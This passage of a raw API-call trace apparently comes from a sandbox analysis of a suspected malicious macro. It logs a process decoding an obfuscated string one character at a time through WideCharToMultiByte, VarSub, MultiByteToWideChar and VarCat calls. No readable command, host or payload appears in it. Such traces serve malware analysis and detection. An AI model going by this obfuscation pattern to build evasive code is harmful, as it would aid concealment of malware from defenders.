lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.756] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0168.757] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.757] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0168.757] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.758] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0168.758] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.759] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0x1168434, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0168.759] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.760] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0168.760] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.760] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x11683e4, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0168.776] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.781] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0168.781] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.782] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0168.782] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.783] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0168.783] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.784] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0168.784] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.785] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0168.785] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.786] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0168.786] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.787] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.787] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.788] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0168.789] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.789] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0168.790] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.790] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0168.791] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.792] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0168.922] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.922] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0168.923] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.923] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0168.924] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.924] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0168.924] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.925] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0168.925] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.926] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.926] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.927] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0168.927] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.928] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0168.928] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.929] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0168.930] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.930] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0168.931] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.931] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0168.932] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.936] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0168.937] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.937] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0168.937] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.938] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0168.938] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.939] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0168.939] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.940] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.940] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.940] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0168.941] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.941] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0168.941] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.942] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0168.942] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.943] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0168.943] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.944] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", 